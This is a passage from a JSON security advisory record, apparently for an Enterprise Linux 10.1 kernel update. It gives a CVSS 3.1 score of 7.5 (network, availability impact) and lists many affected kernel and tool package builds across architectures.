"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
